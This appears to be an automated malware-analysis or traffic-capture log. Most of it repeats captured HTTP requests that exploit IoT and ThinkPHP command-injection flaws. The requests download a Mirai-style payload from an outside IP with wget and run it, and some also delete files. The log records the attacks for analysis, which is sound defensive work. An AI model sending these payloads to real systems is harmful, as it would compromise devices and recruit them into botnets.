Source: unknown | Network traffic detected: HTTP traffic on port 51016 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 34586 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 45094 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 37166 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54878 |
Source: unknown | Network traffic detected: HTTP traffic on port 49206 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 40756 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 46590 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60922 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 32890 |
Source: unknown | Network traffic detected: HTTP traffic on port 49340 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53792 |
Source: unknown | Network traffic detected: HTTP traffic on port 35844 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 44902 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 45954 |
Source: unknown | Network traffic detected: HTTP traffic on port 40140 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 47782 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 35530 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 41350 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 39270 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 34818 |
Source: unknown | Network traffic detected: HTTP traffic on port 52522 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 35906 |
Source: unknown | Network traffic detected: HTTP traffic on port 51242 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55976 |
Source: unknown | Network traffic detected: HTTP traffic on port 35878 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 60786 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50046 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 39038 |
Source: unknown | Network traffic detected: HTTP traffic on port 53400 -> 443 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 53314 |
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 52466 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /boaform/admin/formPing?target_addr=;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/linkz;sh%20/tmp/linkz%27/&waninf=1_INTERNET_R_VID_154$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, World |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+177.71.255.227/self;chmod+777+*;sh+jaws HTTP/1.1User-Agent: Hello, worldHost: 127.0.0.1:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive |
Source: global traffic | HTTP traffic detected: GET /login.cgi?cli=aa%20aa%27;wget%20http://177.71.255.227/self%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Hakai/2.0 |
Source: global traffic | HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://177.71.255.227/bins/mirai.x86 -O dvrHelper; chmod 777 dvrHelper; ./dvrHelper thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Tsunami/2.0 |
